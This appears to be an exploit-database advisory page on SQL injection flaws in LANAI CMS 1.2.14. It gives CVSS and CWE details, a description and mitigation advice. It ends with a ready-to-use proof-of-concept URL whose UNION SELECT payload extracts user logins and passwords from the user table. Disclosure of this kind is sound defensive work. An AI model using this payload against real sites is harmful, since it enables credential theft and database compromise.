header-logo
Suggest Exploit
vendor:
LANAI CMS
by:
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LANAI CMS
Affected Version From: LANAI CMS 1.2.14
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:lanai_cms_project:lanai_cms:1.2.14
Metasploit:
Other Scripts:
Platforms Tested:

SQL Injection vulnerabilities in LANAI CMS

The LANAI CMS is vulnerable to multiple SQL injection vulnerabilities due to inadequate sanitization of user-supplied data before using it in an SQL query. Exploiting these vulnerabilities can allow an attacker to compromise the application, access or modify data, or exploit other vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating the LANAI CMS to the latest version is also advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25193/info
  
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. 

http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/*